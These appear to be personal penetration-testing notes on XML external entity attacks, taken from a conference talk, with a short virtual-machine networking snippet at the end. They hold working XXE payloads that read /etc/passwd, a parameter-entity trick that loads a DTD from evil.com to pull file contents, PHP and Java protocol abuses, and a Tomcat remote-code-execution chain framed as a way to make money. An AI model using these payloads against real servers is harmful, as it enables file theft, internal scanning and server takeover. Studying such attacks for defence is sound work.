Also try to use the same parser you'll be exploiting, since different parsers may behave differently. (for example, I wasn't able to get back PHP code from PHP's simpleXML parser, even when I inputted the CDATA and PHP code by hand (when it printed simplexml_load_string as a string (probably not the implementation you'll see in the wild). Even though Python worked. Also, <name><![CDATA[<name1>BradChad</name>]]></name> still outputted only BradChad, so this was the fault of the parser.)

(*)(EXPLOIT)You can do it without pulling some tricks (With limitations). This allows you to steal things like /etc/passwd
If you do:

<!DOCTYPE test [<!ENTITY x SYSTEM "file:///etc/passwd">]><name>&x;</name>

Then there are some heavy restrictions:
1) The data is stored server-side in the <name> field, and you need to be able to see it client-side to get the data.
2) The data you're stealing has to be well-formed XML, so:
	a) no binary
	b) in text, no stray '&', '<' or '>'
	c) IMPORTANT - well-formed XML documents can be included, but are often not usable.
		The application is going to try and interpret what you've included. It's going to find a whole series of more tags,
		and it's either gonna fail the validation or it's not gonna pull the text in as raw text,
		it's gonna pull in any data around the next set of tags, so you don't actually get access to the data.

(*) If you get a little bit more complex, you can get around those restrictions by using parameter entities.

(info) A parameter entity is pretty much reusable variable text that you can put inside an entity.
	For example,
	<!ELEMENT residence (name, street, pincode, city, phone)>  //is the same as
	<!ENTITY % area "name, street, pincode, city">  //These three lines
	<!ENTITY % contact "phone">
	<!ELEMENT residence (%area; %contact;)>

(what doesn't work) You can't do <!ENTITY start "<![CDATA["> because it's not well-formed XML (otherwise you could
surround any include in CDATA tags, which means to interpret it as raw text.

(the exploit) However, you CAN do it with parameter entities!

<!DOCTYPE updateProfile [
	//first we make the parameter entities
	<!ENTITY % start "<![CDATA[">
	<!ENTITY % file SYSTEM "file://c:/has/broken/xml">   //I think a third '/' is necessary after 'file:'?
	<!ENTITY % end "]]>">
	//Then we grab a DTD file from our own website (necessary)
	<!ENTITY % dtd SYSTEM "http://evil.com/join.dtd">
 	//By writing it out we are effectively executing the parameter entity as an entity
 	%dtd;
]>

//This is the join.dtd on our website
<!ENTITY all "%start;%file;%end">

//This is the field
<name>&all;</name>

This allows you to read well-formed xml documents (you can probably also use this to port scan internal services by doing http:// instead of file://). Still some restrictions:
	1) Needs well-formed XML document   //Not sure if this is true.
	2) No binary
	3) Still requires that you get that data back somehow (for example by viewing your profile)

(*)(EXPLOIT) You can do even better. You can make it so that you don't have to get the data back somehow. Refer to 12:52 in the video.
	1) Still no binary
	2) either " or ' will cause the error
	3) # will cause URL truncation //both 2) and 3) are because of the send entity. If you imagine how variables are placed into that query, you'll understand why that is.

(*) You can use URL protocols to do cool things. External entity support may or may not be necessary (depends if you do the inclusion in <!ENTITY ...> or <!DOCTYPE ...>)
Note: This is (as I understand it) done by doing the thing where you ask the parser to pull a DTD from a website.
Look at 15:21 of video to see which platforms give you which options (also read the whitepaper in the [+] above this one.

(*)PHP IS THE MOST AWESOME THING EVER!
For example, if they're using PHP, you can get also get any file format through the use of URL protocols. (php://filter/convert.base64-encode/resource= - the base64 transition)

(*)Java - use file:// for directory listings.
Use jar:// to  (20:00)
	1)retrieve a zip file from the internet (allows for DoS via decompression bombs or via filling up filling up temporary space)
	2)look inside zip directories (like jar, zip, docx, xlsx) and retrieve files
	3)File upload to the remote server (21:22).
If the java is old (pre september 2012. 1.7u7, 1.6u32 and earlier), then gopher:// can be used to send arbitrary data (17:43) (useful for internal network CSRF, port scanning, exploiting secondary network vulns)

(*)(EXPLOIT) Remote Code Execution scenario on older Tomcat server with a private admin panel on the backend:
	1) Supposing that the server gives you back the data, you can use jar's file:// to explore the server and see directory listings.
	2) Let's say you find Tomcat-users.xml (lists users that have access to the private admin interface)
	3) Upload file to server - evil.war. Hang the connection so the temporary uploaded file stays on the server.
	4) Find our file using directory listings
	5) Use gopher to authenticate against the admin interface (instead of using gopher you could CSRF an internal user (probably by using XML entities for the CSRF) and still get the same result)
	6) Use the admin interface to deploy the temp file as a new app
	7) ???
	8) Ca$h m0n3y!

------------------------------------------------
WAF bypassing/Web application firewall bypassing
------------------------------------------------
http://securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20POC2009%20Shocking%20News%20In%20PHP%20Exploitation.pdf

Various
---------------
Virtual Machine
---------------
Connecting to the VM:
Edit /etc/interfaces to make the ip static. Make the ip be in the same range as the adapter and set the gateway to the adapter
sudo nano /etc/network/interfaces
iface eth0 inet static
address 192.168.56.20
netmask 255.255.255.0
gateway 192.168.56.1
sudo ifdown eth0
sudo ifup eth0